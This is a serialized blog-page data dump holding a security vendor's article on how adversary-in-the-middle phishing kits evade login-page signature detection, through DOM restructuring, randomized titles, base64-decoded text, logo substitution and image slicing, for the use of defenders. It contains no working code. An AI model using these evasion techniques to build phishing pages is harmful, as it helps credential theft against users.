data":55982,"marks":55983,"value":53948,"nodeType":864},{},[],{"data":55985,"content":55988,"nodeType":996},{"target":55986},{"sys":55987},{"id":53953,"type":1001,"linkType":1002},[],{"data":55990,"content":55991,"nodeType":860},{},[55992],{"data":55993,"marks":55994,"value":53961,"nodeType":864},{},[],{"data":55996,"content":55997,"nodeType":860},{},[55998,56001,56008],{"data":55999,"marks":56000,"value":53968,"nodeType":864},{},[],{"data":56002,"content":56003,"nodeType":883},{"uri":35355},[56004],{"data":56005,"marks":56006,"value":53976,"nodeType":864},{},[56007],{"type":1455},{"data":56009,"marks":56010,"value":53980,"nodeType":864},{},[],{"data":56012,"content":56015,"nodeType":996},{"target":56013},{"sys":56014},{"id":53985,"type":1001,"linkType":1002},[],{"data":56017,"content":56018,"nodeType":1009},{},[56019],{"data":56020,"marks":56021,"value":53993,"nodeType":864},{},[],{"data":56023,"content":56024,"nodeType":860},{},[56025,56028,56032,56035,56042],{"data":56026,"marks":56027,"value":54000,"nodeType":864},{},[],{"data":56029,"marks":56030,"value":54005,"nodeType":864},{},[56031],{"type":899},{"data":56033,"marks":56034,"value":54009,"nodeType":864},{},[],{"data":56036,"content":56037,"nodeType":883},{"uri":24354},[56038],{"data":56039,"marks":56040,"value":54017,"nodeType":864},{},[56041],{"type":1455},{"data":56043,"marks":56044,"value":2924,"nodeType":864},{},[],{"data":56046,"content":56047,"nodeType":860},{},[56048],{"data":56049,"marks":56050,"value":54027,"nodeType":864},{},[],{"data":56052,"content":56053,"nodeType":860},{},[56054],{"data":56055,"marks":56056,"value":54034,"nodeType":864},{},[],{"data":56058,"content":56059,"nodeType":860},{},[56060],{"data":56061,"marks":56062,"value":54042,"nodeType":864},{},[56063],{"type":10610},{"entries":56065},{"hyperlink":56066,"inline":56067,"block":56068},[],[],[56069,56075,56078,56085,56092,56099,56106,56113,56120,56127],{"sys":56070,"__typename":1717,"type":1718,"ctaText":56071,"buttonLabel":56072,"buttonColour":56073,"buttonUrl":56074},{"id":53534},"Check out our on-demand webinar to see more ways how AitM toolkits like NakedPages, Tycoon and Evilginx evade detection","Watch Now","sea blue","https://pushsecurity.com/resources/on-demand-webinar-phish-kit-teardown",{"sys":56076,"__typename":1724,"title":53437,"caption":53438,"layoutMode":59,"file":56077},{"id":52212},{"url":48463,"width":48464,"height":48465},{"sys":56079,"__typename":1724,"title":56080,"caption":56080,"layoutMode":59,"file":56081},{"id":53688}," Turns out encryption is hard for attackers as well",{"url":56082,"width":56083,"height":56084},"https://images.ctfassets.net/y1cdw1ablpvd/6pBPG14eFuJclV4KNtDVtG/1c335e64e4ac779b9bdfbb287e8424c6/image5.png",580,418,{"sys":56086,"__typename":1724,"title":14261,"caption":56087,"layoutMode":59,"file":56088},{"id":53746},"If everything doesn’t go perfectly you end up on example.com instead of the phishing page",{"url":56089,"width":56090,"height":56091},"https://images.ctfassets.net/y1cdw1ablpvd/4ABcdZCFsxrZYSHYpQNZY1/f2d6438d1b53ec2e47e0bfbfec44fe59/image6.png",1422,574,{"sys":56093,"__typename":1724,"title":56094,"caption":56094,"layoutMode":59,"file":56095},{"id":53797},"The href.li service that hides referrers",{"url":56096,"width":56097,"height":56098},"https://images.ctfassets.net/y1cdw1ablpvd/6lfYLQVz50TRqhfuOE3020/5ca9a4ccee7894769a3b9e39addf5b5c/image7.png",1636,614,{"sys":56100,"__typename":1724,"title":56101,"caption":59,"layoutMode":59,"file":56102},{"id":53831},"URL with a JWT auth parameter:",{"url":56103,"width":56104,"height":56105},"https://images.ctfassets.net/y1cdw1ablpvd/1wFzygwfEek9GamL9NxzXm/d537558134774817d9dc87075cd3db8f/image8.png",1654,660,{"sys":56107,"__typename":1724,"title":56108,"caption":59,"layoutMode":59,"file":56109},{"id":53837},"URL with a JWT auth parameter (2)",{"url":56110,"width":56111,"height":56112},"https://images.ctfassets.net/y1cdw1ablpvd/1m75J16LXvOv3ilKd2PndP/60e24888b30259018d9b36c2171b990b/image3.png",1226,906,{"sys":56114,"__typename":1724,"title":56115,"caption":59,"layoutMode":59,"file":56116},{"id":53864},"Breaking login page signatures",{"url":56117,"width":56118,"height":56119},"https://images.ctfassets.net/y1cdw1ablpvd/5zCs41eAanFqhO8lEqmhSn/4aad92d073bf87a7d03fd7c8901f29e6/image1.png",1935,761,{"sys":56121,"__typename":1724,"title":56122,"caption":59,"layoutMode":59,"file":56123},{"id":53953},"VirusTotal entry for NakedPages URL",{"url":56124,"width":56125,"height":56126},"https://images.ctfassets.net/y1cdw1ablpvd/6f6zM8NSe0UZ0H9ydCDgqi/784b6a8ad40f32835d7e8733010f8ad0/image4.png",1340,277,{"sys":56128,"__typename":1717,"type":1718,"ctaText":56129,"buttonLabel":56130,"buttonColour":56131,"buttonUrl":48183},{"id":53985},"Want to see more ways AitM kits evade detection? Check out Part 2 here.","Read Blog","orange",{"items":56133},[],{},"Analyzing AitM phish kits and the ways they evade detection",{"items":56137},[56138,56834,57327],{"__typename":2059,"sys":56139,"content":56141,"title":56820,"synopsis":56821,"hashTags":59,"publishedDate":56822,"slug":56823,"tagsCollection":56824,"authorsCollection":56830},{"id":56140},"6XHbplcolYfUeAB6x3olYQ",{"json":56142},{"data":56143,"content":56144,"nodeType":856},{},[56145,56152,56171,56204,56211,56217,56224,56231,56264,56271,56278,56285,56292,56298,56305,56312,56319,56326,56333,56340,56347,56354,56361,56368,56375,56382,56388,56394,56401,56408,56415,56422,56428,56435,56442,56460,56467,56487,56493,56500,56507,56514,56521,56527,56534,56541,56548,56555,56562,56568,56574,56581,56588,56595,56602,56609,56616,56622,56629,56636,56643,56650,56657,56663,56669,56676,56683,56690,56696,56703,56710,56717,56723,56730,56736,56743,56749,56766,56784,56791,56808,56814],{"data":56146,"content":56147,"nodeType":1009},{},[56148],{"data":56149,"marks":56150,"value":56151,"nodeType":864},{},[],"Picking up where we left off...",{"data":56153,"content":56154,"nodeType":860},{},[56155,56159,56167],{"data":56156,"marks":56157,"value":56158,"nodeType":864},{},[],"In our previous ",{"data":56160,"content":56161,"nodeType":883},{"uri":48183},[56162],{"data":56163,"marks":56164,"value":56166,"nodeType":864},{},[56165],{"type":1455},"blog post",{"data":56168,"marks":56169,"value":56170,"nodeType":864},{},[],", we looked at a range of techniques implemented by a then-recent instance of the NakedPages AiTM phishing kit for evading detection. The techniques covered previously were mostly intended to make two detection strategies for defenders much more difficult:",{"data":56172,"content":56173,"nodeType":941},{},[56174,56189],{"data":56175,"content":56176,"nodeType":945},{},[56177],{"data":56178,"content":56179,"nodeType":860},{},[56180,56185],{"data":56181,"marks":56182,"value":56184,"nodeType":864},{},[56183],{"type":899},"Writing toolkit signatures",{"data":56186,"marks":56187,"value":56188,"nodeType":864},{},[],": Through heavy use of randomization, constantly changing hosting domains/IPs, legitimate hosting options etc., it becomes very difficult for defenders to maintain effective signatures to detect either generic phishing kit code or where they are hosted.",{"data":56190,"content":56191,"nodeType":945},{},[56192],{"data":56193,"content":56194,"nodeType":860},{},[56195,56200],{"data":56196,"marks":56197,"value":56199,"nodeType":864},{},[56198],{"type":899},"Automating dynamic analysis",{"data":56201,"marks":56202,"value":56203,"nodeType":864},{},[],": Similarly to sandbox evasion for malware, phishing kits are designed to evade automated discovery and analysis, e.g. by using Cloudflare Turnstile bot detection, and requiring legitimate browser interaction and JavaScript execution in order for execution flow to reach the malicious phishing functionality.",{"data":56205,"content":56206,"nodeType":860},{},[56207],{"data":56208,"marks":56209,"value":56210,"nodeType":864},{},[],"In this blog post, we're diving deeper into a specific category of signature-based detection and how attackers are getting around them: Login page signatures. ",{"data":56212,"content":56216,"nodeType":996},{"target":56213},{"sys":56214},{"id":56215,"type":1001,"linkType":1002},"1aaDMth4Cxv6CMT0PJW5py",[],{"data":56218,"content":56219,"nodeType":1009},{},[56220],{"data":56221,"marks":56222,"value":56223,"nodeType":864},{},[],"Login page signatures 101",{"data":56225,"content":56226,"nodeType":860},{},[56227],{"data":56228,"marks":56229,"value":56230,"nodeType":864},{},[],"The overwhelming majority of common AiTM phishing kits in the wild now are targeting the most dominant identity providers (IdPs), such as Microsoft Entra or Google Workspace. They typically emulate the login pages of these platforms to ensure the victim uses the correct password and MFA factor and completes the login process, so the attacker can steal the valid session.",{"data":56232,"content":56233,"nodeType":860},{},[56234,56238,56243,56246,56251,56255,56260],{"data":56235,"marks":56236,"value":56237,"nodeType":864},{},[],"As a result, security product vendors are naturally looking to move away from unreliable detections based on signaturing ever-changing phishing kits, toward detecting login pages that ",{"data":56239,"marks":56240,"value":56242,"nodeType":864},{},[56241],{"type":899},"look like",{"data":56244,"marks":56245,"value":1171,"nodeType":864},{},[],{"data":56247,"marks":56248,"value":56250,"nodeType":864},{},[56249],{"type":899},"Microsoft Entra, Google Workspace",{"data":56252,"marks":56253,"value":56254,"nodeType":864},{},[]," (or any other common IdP) ",{"data":56256,"marks":56257,"value":56259,"nodeType":864},{},[56258],{"type":899},"but are not hosted on the official domains",{"data":56261,"marks":56262,"value":56263,"nodeType":864},{},[],". The benefit here is that you’re focusing on a fixed, known target, rather than a constantly moving one (e.g. phishing kit codebases).",{"data":56265,"content":56266,"nodeType":860},{},[56267],{"data":56268,"marks":56269,"value":56270,"nodeType":864},{},[],"However, attackers have managed to stay one step ahead and are already using a wide range of techniques to break these detections and counter the countermeasures.",{"data":56272,"content":56273,"nodeType":1009},{},[56274],{"data":56275,"marks":56276,"value":56277,"nodeType":864},{},[],"Signature evasion strategies",{"data":56279,"content":56280,"nodeType":860},{},[56281],{"data":56282,"marks":56283,"value":56284,"nodeType":864},{},[],"Well, like most good ideas, someone else has already had it — many phishing kits pre-emptively take steps to evade detections based on login page signatures. The specific evasion techniques used are a useful insight into what detection techniques are out there and are needing to be circumvented. ",{"data":56286,"content":56287,"nodeType":860},{},[56288],{"data":56289,"marks":56290,"value":56291,"nodeType":864},{},[],"Before we delve into the specific examples, let’s first consider the general strategies for this: document object model (DOM) obfuscation, and visual obfuscation. ",{"data":56293,"content":56294,"nodeType":1312},{},[56295],{"data":56296,"marks":56297,"value":41130,"nodeType":864},{},[],{"data":56299,"content":56300,"nodeType":860},{},[56301],{"data":56302,"marks":56303,"value":56304,"nodeType":864},{},[],"This is the more traditional evasion approach. The goal for an attacker is to have a login page that is visually identical to the real page when viewed with the human eye. ",{"data":56306,"content":56307,"nodeType":860},{},[56308],{"data":56309,"marks":56310,"value":56311,"nodeType":864},{},[],"But that doesn’t mean the underlying DOM (or loaded HTML, CSS, and JS code) needs to be the same, or even similar, to the real login page. It’s possible to  construct a completely different DOM that ensures the same visual output with a very different underlying code. ",{"data":56313,"content":56314,"nodeType":860},{},[56315],{"data":56316,"marks":56317,"value":56318,"nodeType":864},{},[],"It’s also possible to use dynamic modification techniques to ensure the DOM changes during execution to frustrate fixed point-in-time analysis controls, like those that may be used by web proxies.  ",{"data":56320,"content":56321,"nodeType":1312},{},[56322],{"data":56323,"marks":56324,"value":56325,"nodeType":864},{},[],"Visual obfuscation",{"data":56327,"content":56328,"nodeType":860},{},[56329],{"data":56330,"marks":56331,"value":56332,"nodeType":864},{},[],"With the ever-increasing capabilities of machine learning (ML) and other artificial intelligence (AI) technologies, we don’t just have to look at the underlying code and text signatures anymore. There are a range of computer vision based techniques that can be used to simulate a more human approach to assessing if a login page matches another example. ",{"data":56334,"content":56335,"nodeType":860},{},[56336],{"data":56337,"marks":56338,"value":56339,"nodeType":864},{},[],"Therefore, another approach to defeat login page signatures would be to perform visual obfuscation techniques that can frustrate computer vision-based detections, while still fooling a human user.",{"data":56341,"content":56342,"nodeType":1009},{},[56343],{"data":56344,"marks":56345,"value":56346,"nodeType":864},{},[],"DOM obfuscation techniques",{"data":56348,"content":56349,"nodeType":860},{},[56350],{"data":56351,"marks":56352,"value":56353,"nodeType":864},{},[],"For consistency, we’re going to focus on Microsoft login phishing kits as they are the most common (by far), but we’ll pick from some different samples we’ve observed. Let’s start with a few examples of DOM obfuscation we have seen in the wild:",{"data":56355,"content":56356,"nodeType":1312},{},[56357],{"data":56358,"marks":56359,"value":56360,"nodeType":864},{},[],"#1 – DOM structure change",{"data":56362,"content":56363,"nodeType":860},{},[56364],{"data":56365,"marks":56366,"value":56367,"nodeType":864},{},[],"If an attacker were to simply clone Microsoft’s login page, then we’d expect to see a very similar (if not identical) DOM structure, right? After all, the simplest way to emulate a web page visually is either to copy the HTML directly or transparently proxy requests to the real target with minimal changes, as tools like Evilginx do. This would make detection far simpler as we’d have a known code structure to look for. ",{"data":56369,"content":56370,"nodeType":860},{},[56371],{"data":56372,"marks":56373,"value":56374,"nodeType":864},{},[],"Unfortunately, it’s pretty common for attackers to deliberately use a completely different DOM structure for something that’s almost identical to the eye. It takes a lot more effort to implement this and so the reason for it is almost certainly to avoid this detection technique.  ",{"data":56376,"content":56377,"nodeType":860},{},[56378],{"data":56379,"marks":56380,"value":56381,"nodeType":864},{},[],"Check out the examples below to see a high-level interpretation of the DOM structure for a legitimate Microsoft login page and one phishing example. You can see how they are visually very similar, but radically different from one another when looking at DOM code:",{"data":56383,"content":56387,"nodeType":996},{"target":56384},{"sys":56385},{"id":56386,"type":1001,"linkType":1002},"4amv144ZzTBmd9ssh66kkr",[],{"data":56389,"content":56393,"nodeType":996},{"target":56390},{"sys":56391},{"id":56392,"type":1001,"linkType":1002},"2gC49b2f2Th4wAEWLPvAnL",[],{"data":56395,"content":56396,"nodeType":1312},{},[56397],{"data":56398,"marks":56399,"value":56400,"nodeType":864},{},[],"#2 – Randomizing page titles",{"data":56402,"content":56403,"nodeType":860},{},[56404],{"data":56405,"marks":56406,"value":56407,"nodeType":864},{},[],"The HTML page title is one very specific place to check for similarity. For Microsoft, it can change slightly depending on the service, but if we use Outlook as an example then the page title is “Sign in to Outlook”. This also has a favicon of the Microsoft logo (another issue we’ll visit later in the article). \n\nIt’s unsurprising that attackers are randomizing the page title to evade basic detections – how many users would really notice any difference?",{"data":56409,"content":56410,"nodeType":860},{},[56411],{"data":56412,"marks":56413,"value":56414,"nodeType":864},{},[],"Some kits, such as the NakedPages case study we looked at in the previous article, use purely randomized alphanumeric text. Others use english words that may seem innocuous if a user does inspect them, but are in fact randomized between iterations to ensure any one set that is flagged will not completely block the phishing kit from operating. ",{"data":56416,"content":56417,"nodeType":860},{},[56418],{"data":56419,"marks":56420,"value":56421,"nodeType":864},{},[],"For example, see three refreshed examples of the same phishing kit below when compared with the legitimate Outlook login page title next to it.",{"data":56423,"content":56427,"nodeType":996},{"target":56424},{"sys":56425},{"id":56426,"type":1001,"linkType":1002},"2KuHCssISCeGYeZNC005pV",[],{"data":56429,"content":56430,"nodeType":1312},{},[56431],{"data":56432,"marks":56433,"value":56434,"nodeType":864},{},[],"#3 – Desktop control techniques (e.g. NoVNC)",{"data":56436,"content":56437,"nodeType":860},{},[56438],{"data":56439,"marks":56440,"value":56441,"nodeType":864},{},[],"The most common AiTM phishing technique is some form of a web proxy method, where the victim interacts with a legitimate website that is proxying certain requests to the real backend. However, this is not the only method. Some tools utilize a Browser-in-the-Middle (BiTM) technique that involves using desktop sharing technologies to remotely control an attacker’s browser instead. ",{"data":56443,"content":56444,"nodeType":860},{},[56445,56449,56457],{"data":56446,"marks":56447,"value":56448,"nodeType":864},{},[],"If you want to know more about this, check out our ",{"data":56450,"content":56451,"nodeType":883},{"uri":35355},[56452],{"data":56453,"marks":56454,"value":56456,"nodeType":864},{},[56455],{"type":1455},"previous article on AiTM phishing",{"data":56458,"marks":56459,"value":2924,"nodeType":864},{},[],{"data":56461,"content":56462,"nodeType":860},{},[56463],{"data":56464,"marks":56465,"value":56466,"nodeType":864},{},[],"The upside of this for an attacker is that the website is actually completely different from the target website under the hood. If anything, it just looks like any other website making use of similar technologies like NoVNC.",{"data":56468,"content":56469,"nodeType":860},{},[56470,56474,56483],{"data":56471,"marks":56472,"value":56473,"nodeType":864},{},[],"For example, see the following screenshot example of using the open-source BiTM tool, ",{"data":56475,"content":56477,"nodeType":883},{"uri":56476},"https://github.com/JoelGMSec/EvilnoVNC",[56478],{"data":56479,"marks":56480,"value":56482,"nodeType":864},{},[56481],{"type":1455},"EvilNoVNC",{"data":56484,"marks":56485,"value":56486,"nodeType":864},{},[],". You can see how the underlying HTML and DOM are completely different due to the use of this technique, with effectively the entire page just being an HTML canvas element that is rendered like a video.",{"data":56488,"content":56492,"nodeType":996},{"target":56489},{"sys":56490},{"id":56491,"type":1001,"linkType":1002},"60Jt2P0ip14ycdtS9qLPhc",[],{"data":56494,"content":56495,"nodeType":1312},{},[56496],{"data":56497,"marks":56498,"value":56499,"nodeType":864},{},[],"#4 – Dynamic text decoding",{"data":56501,"content":56502,"nodeType":860},{},[56503],{"data":56504,"marks":56505,"value":56506,"nodeType":864},{},[],"Sometimes there may be very specific strings that detection tools might try to signature on. Let’s use the example of text that appears visually on the login page. While most login text can be pretty generic, e.g. “Sign in”, that’s not always the case. To appear authentic, it’s better for an attacker to keep it the same, but that leaves it vulnerable to signature detection. ",{"data":56508,"content":56509,"nodeType":860},{},[56510],{"data":56511,"marks":56512,"value":56513,"nodeType":864},{},[],"For example, the placeholder text on Microsoft’s login page is “Email, phone, or Skype”. Particularly given Microsoft’s historical acquisition of Skype, this is actually a pretty specific piece of text that you won’t usually find in the username field of a login page very often. ",{"data":56515,"content":56516,"nodeType":860},{},[56517],{"data":56518,"marks":56519,"value":56520,"nodeType":864},{},[],"So how do you keep this text but make it harder to signature on? Well you fall back to classic decoding techniques to avoid static signatures. In this case, that is decoded from base64 using JavaScript’s atob() function in order to load that text dynamically during execution rather than have it statically within the HTML. This makes it harder to create a signature using common point-in-time static analysis techniques.",{"data":56522,"content":56526,"nodeType":996},{"target":56523},{"sys":56524},{"id":56525,"type":1001,"linkType":1002},"1PymaE09il5CubFvwSfLqW",[],{"data":56528,"content":56529,"nodeType":1312},{},[56530],{"data":56531,"marks":56532,"value":56533,"nodeType":864},{},[],"#5 – Image element obfuscation",{"data":56535,"content":56536,"nodeType":860},{},[56537],{"data":56538,"marks":56539,"value":56540,"nodeType":864},{},[],"We’re starting to shift towards more visual-based obfuscation elements now, but first let’s cover  an interesting example that straddles the two.",{"data":56542,"content":56543,"nodeType":860},{},[56544],{"data":56545,"marks":56546,"value":56547,"nodeType":864},{},[],"Many login pages will have very clear examples of vendor logos present in specific locations and elements as part of a login page. This is a huge part of an authentic visual experience and so attackers would like to keep them there. However, as defenders we could specifically look for these elements, both for pure structural matching techniques or as a pre-processing step for visual matching techniques later (e.g. visually matching a logo, rather than the entire page). ",{"data":56549,"content":56550,"nodeType":860},{},[56551],{"data":56552,"marks":56553,"value":56554,"nodeType":864},{},[],"For this reason, attackers might want to obfuscate this aspect in order to make it difficult to match or locate the images used within the login page, while still ensuring they appear visually identical to a user.",{"data":56556,"content":56557,"nodeType":860},{},[56558],{"data":56559,"marks":56560,"value":56561,"nodeType":864},{},[],"Below, we can see a comparison of a legitimate Microsoft login page and a phishing kit. You can see how in the original a standard HTML \u003Cimg> element of a specific size and name are used. In comparison, our phishing kit has replaced this with a \u003Cdiv> element of a different size and made use of background image styling to ensure the \u003Cdiv> ends up with the same visual appearance despite the structural differences.",{"data":56563,"content":56567,"nodeType":996},{"target":56564},{"sys":56565},{"id":56566,"type":1001,"linkType":1002},"4MvwXZDjMA56ZYSdjKpu9R",[],{"data":56569,"content":56573,"nodeType":996},{"target":56570},{"sys":56571},{"id":56572,"type":1001,"linkType":1002},"6tNMjTvHuAWkuK0x7ZEgKr",[],{"data":56575,"content":56576,"nodeType":1009},{},[56577],{"data":56578,"marks":56579,"value":56580,"nodeType":864},{},[],"Visual obfuscation techniques",{"data":56582,"content":56583,"nodeType":860},{},[56584],{"data":56585,"marks":56586,"value":56587,"nodeType":864},{},[],"As if that wasn’t enough, let’s move on to some visual obfuscation techniques that attackers are also using.",{"data":56589,"content":56590,"nodeType":1312},{},[56591],{"data":56592,"marks":56593,"value":56594,"nodeType":864},{},[],"#6 – Favicon changes",{"data":56596,"content":56597,"nodeType":860},{},[56598],{"data":56599,"marks":56600,"value":56601,"nodeType":864},{},[],"We effectively saw this earlier when speaking about HTML page title randomization. The favicon is also an easy place to look for the obvious use of vendor logos. How many legitimate websites are going to have the Microsoft logo as their favicon? If they do, they may quickly end up with a cease and desist letter!",{"data":56603,"content":56604,"nodeType":860},{},[56605],{"data":56606,"marks":56607,"value":56608,"nodeType":864},{},[],"Favicons also render at a fixed size, so if an attacker wants to ensure that the Microsoft logo appears as the favicon for their page, it gives defenders a fixed target to perform image recognition against for cloned logos. ",{"data":56610,"content":56611,"nodeType":860},{},[56612],{"data":56613,"marks":56614,"value":56615,"nodeType":864},{},[],"In this phishing kit example, it looks like the authors have decided they are better off just leaving the favicon empty to avoid being vulnerable to this detection technique.",{"data":56617,"content":56621,"nodeType":996},{"target":56618},{"sys":56619},{"id":56620,"type":1001,"linkType":1002},"7FknWWF9ri9eZvu8Prhkd5",[],{"data":56623,"content":56624,"nodeType":1312},{},[56625],{"data":56626,"marks":56627,"value":56628,"nodeType":864},{},[],"#7 – Blurred background images",{"data":56630,"content":56631,"nodeType":860},{},[56632],{"data":56633,"marks":56634,"value":56635,"nodeType":864},{},[],"Ok, this is a pretty clever one. Let’s say as a defender we wanted to perform sophisticated image recognition techniques to detect websites that look visually very similar to Microsoft’s login page overall. There may be many challenges around rendering resolution etc to deal with but conceptually we could look to match on the whole page. ",{"data":56637,"content":56638,"nodeType":860},{},[56639],{"data":56640,"marks":56641,"value":56642,"nodeType":864},{},[],"However, if an attacker makes a substantial visual change to the page that still appears authentic then this would prevent the technique from operating effectively. One common graphic design method used when a modal pops up is to blur the background. Some phishing kits use similar techniques on their login pages with a variety of different background images that are derived from legitimate Microsoft sources. ",{"data":56644,"content":56645,"nodeType":860},{},[56646],{"data":56647,"marks":56648,"value":56649,"nodeType":864},{},[],"The first time you see this, it’s easy to think you’ve seen this a hundred times before. It just seems very familiar and authentic… except it’s not. The real login page has a blank background. Therefore, any algorithms looking for visual similarity of the overall page are not going to match because they are actually radically different. ",{"data":56651,"content":56652,"nodeType":860},{},[56653],{"data":56654,"marks":56655,"value":56656,"nodeType":864},{},[],"This is a trick on the human brain and the way we interpret images, not a trick on a computer vision algorithm. Take a look at the phishing example and the real Microsoft login page below:",{"data":56658,"content":56662,"nodeType":996},{"target":56659},{"sys":56660},{"id":56661,"type":1001,"linkType":1002},"6KnrHECqltSOgSCGHIjYEL",[],{"data":56664,"content":56668,"nodeType":996},{"target":56665},{"sys":56666},{"id":56667,"type":1001,"linkType":1002},"1nb6K1MyBkON2eBHk1365B",[],{"data":56670,"content":56671,"nodeType":1312},{},[56672],{"data":56673,"marks":56674,"value":56675,"nodeType":864},{},[],"#8 – Logo substitution",{"data":56677,"content":56678,"nodeType":860},{},[56679],{"data":56680,"marks":56681,"value":56682,"nodeType":864},{},[],"You might have noticed one other change with the previous image – the logo that was used. We saw earlier how some phishing kits make it harder to identify individual logos within an image through DOM obfuscation techniques. However, the other approach is to substitute logos for similar ones that give a sense of authenticity to the user but are visually completely different.",{"data":56684,"content":56685,"nodeType":860},{},[56686],{"data":56687,"marks":56688,"value":56689,"nodeType":864},{},[],"In this case, the phishing kit has chosen to use the newer purple hexagon Microsoft 365 logo in place of the standard Microsoft logo on the login page. Users will no doubt be familiar with this logo as belonging to Microsoft and so it still gives the sense of authenticity. A computer vision algorithm looking to match the original logo won’t know that though!",{"data":56691,"content":56695,"nodeType":996},{"target":56692},{"sys":56693},{"id":56694,"type":1001,"linkType":1002},"5o1WRmupkYPr9QmeQUf5uF",[],{"data":56697,"content":56698,"nodeType":1312},{},[56699],{"data":56700,"marks":56701,"value":56702,"nodeType":864},{},[],"#9 - Sub-image obfuscation",{"data":56704,"content":56705,"nodeType":860},{},[56706],{"data":56707,"marks":56708,"value":56709,"nodeType":864},{},[],"Ok, so let’s say an attacker wants to use the real logo and they’ve even used the image element obfuscation method we saw earlier to dynamically set the image as a background image for a \u003Cdiv> element. ",{"data":56711,"content":56712,"nodeType":860},{},[56713],{"data":56714,"marks":56715,"value":56716,"nodeType":864},{},[],"However, it’s not impossible for these images to be isolated and analyzed. Perhaps a defender might enumerate all divs, compute the background images and analyze them all. We can see an example of using code to do this to determine the image used by a \u003Cdiv> element in a phishing kit below:",{"data":56718,"content":56722,"nodeType":996},{"target":56719},{"sys":56720},{"id":56721,"type":1001,"linkType":1002},"79e7r8I5p0Nh9hpqrRs9eJ",[],{"data":56724,"content":56725,"nodeType":860},{},[56726],{"data":56727,"marks":56728,"value":56729,"nodeType":864},{},[],"This gives us the base64 image data that was set as the background image. However, if we look at that image data directly we see it’s an obfuscated form of the image, even though it displays correctly when properly cropped as it’s embedded in the overall page:",{"data":56731,"content":56735,"nodeType":996},{"target":56732},{"sys":56733},{"id":56734,"type":1001,"linkType":1002},"jXlXRHrezWsZ27CiQIyBO",[],{"data":56737,"content":56738,"nodeType":860},{},[56739],{"data":56740,"marks":56741,"value":56742,"nodeType":864},{},[],"This makes it harder for a visual algorithm to match the logo as it’s clearly not exactly the same. Instead, careful construction of the div and related DOM has ensured that these obfuscated edge pieces do not show visually to the user.",{"data":56744,"content":56745,"nodeType":1009},{},[56746],{"data":56747,"marks":56748,"value":24968,"nodeType":864},{},[],{"data":56750,"content":56751,"nodeType":860},{},[56752,56755,56762],{"data":56753,"marks":56754,"value":1499,"nodeType":864},{},[],{"data":56756,"content":56757,"nodeType":883},{"uri":48183},[56758],{"data":56759,"marks":56760,"value":56761,"nodeType":864},{},[],"our previous article",{"data":56763,"marks":56764,"value":56765,"nodeType":864},{},[],", we looked at a higher level set of techniques used by phishing kits to avoid detection. In this article, we’ve dived deeper into one particular strategy of breaking login page signatures and have shown how, even inside of this one strategy, there are many different sub-techniques being used to evade common detections.",{"data":56767,"content":56768,"nodeType":860},{},[56769,56773,56780],{"data":56770,"marks":56771,"value":56772,"nodeType":864},{},[],"Looking at the evasion techniques discussed here and in ",{"data":56774,"content":56775,"nodeType":883},{"uri":48183},[56776],{"data":56777,"marks":56778,"value":56779,"nodeType":864},{},[],"Part 1",{"data":56781,"marks":56782,"value":56783,"nodeType":864},{},[],", it’s pretty clear that attackers are consciously looking to bypass automated detection techniques typically implemented through either web traffic analysis (using a web proxy inspection tool or Secure Web Gateway) or website sandboxing (for example link analysis provided by an email security appliance).",{"data":56785,"content":56786,"nodeType":860},{},[56787],{"data":56788,"marks":56789,"value":56790,"nodeType":864},{},[],"On a positive note, this shows us that (at least some) detection tools are trending upwards on the Pyramid of Pain — moving away from nearly pointless signatures like IP addresses and domains towards more in-depth detections of specific tool techniques. Though it’s also fair to say that, in this cat-and-mouse game, it seems the attackers are maintaining the advantage. This may be because these detection technologies are widely available, and attackers can test their kits against these tools and change them just enough to bypass them.",{"data":56792,"content":56793,"nodeType":860},{},[56794,56798,56805],{"data":56795,"marks":56796,"value":56797,"nodeType":864},{},[],"If you’re interested in how Push is able to detect these attacks despite all these ever evolving evasion techniques by using browser telemetry and evaluating user interaction with these kits — ",{"data":56799,"content":56800,"nodeType":883},{"uri":39788},[56801],{"data":56802,"marks":56803,"value":56804,"nodeType":864},{},[],"take a look at how we do phishing detection.",{"data":56806,"marks":56807,"value":21,"nodeType":864},{},[],{"data":56809,"content":56813,"nodeType":996},{"target":56810},{"sys":56811},{"id":56812,"type":1001,"linkType":1002},"6H8HmAmYiGvs3T7kQLA4dd",[],{"data":56815,"content":56816,"nodeType":860},{},[56817],{"data":56818,"marks":56819,"value":21,"nodeType":864},{},[],"How AitM phishing kits evade detection: Part 2","How attackers are breaking detection signatures designed to identify phishing sites impersonating real login pages.","2024-11-12T00:00:00.000Z","how-aitm-phishing-kits-evade-detection-p2",{"items":56825},[56826,56828],{"sys":56827,"name":342},{"id":6596},{"sys":56829,"name":6593},{"id":6592},{"items":56831},[56832],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":56833},{"url":4955},{"__typename":2059,"sys":56835,"content":56837,"title":57313,"synopsis":57314,"hashTags":59,"publishedDate":57315,"slug":57316,"tagsCollection":57317,"authorsCollection":57323},{"id":56836},"7yCGcUryKQGOHYHRtipn6W",{"json":56838},{"data":56839,"content":56840,"nodeType":856},{},[56841,56848,56855,56862,56869,56876,56883,56890,56897,56904,56922,56940,56947,56954,56974,56981,56993,57036,57043,57062,57070,57077,57084,57091,57098,57105,57170,57177,57183,57190,57197,57204,57211,57231,57238,57245,57252,57259,57266,57273,57280,57287,57294,57300,57306],{"data":56842,"content":56843,"nodeType":860},{},[56844],{"data":56845,"marks":56846,"value":56847,"nodeType":864},{},[],"User web activity can be a rich source of attack detection data. To this end, most organizations today ingest some form of network traffic data for security monitoring purposes. ",{"data":56849,"content":56850,"nodeType":860},{},[56851],{"data":56852,"marks":56853,"value":56854,"nodeType":864},{},[],"Typically, network traffic data is gathered by analyzing web proxy and/or DNS logs. But, we regularly speak to organizations that are frustrated with the challenge of piecing together web traffic data, without understanding the opportunity presented by the alternatives.",{"data":56856,"content":56857,"nodeType":860},{},[56858],{"data":56859,"marks":56860,"value":56861,"nodeType":864},{},[],"Even with proxies that can terminate TLS-encrypted datastreams, it’s difficult for even expert security teams to collect and analyze any meaningful data from web proxy logs. While the kind of data needed might be technically possible to extract, the process of reconstructing proxy data to analyze the specific data points that you really need, at scale, is prohibitively complicated.",{"data":56863,"content":56864,"nodeType":860},{},[56865],{"data":56866,"marks":56867,"value":56868,"nodeType":864},{},[],"The old “needle in a haystack” adage is very apt here! Rather than trying to piece together half-broken data – overlaying noisy proxy logs with other sources such as app and IdP telemetry – we think that the browser presents a much simpler way of analyzing relevant data points, particularly when it comes to identity attacks. ",{"data":56870,"content":56871,"nodeType":860},{},[56872],{"data":56873,"marks":56874,"value":56875,"nodeType":864},{},[],"Before we get on to detection opportunities 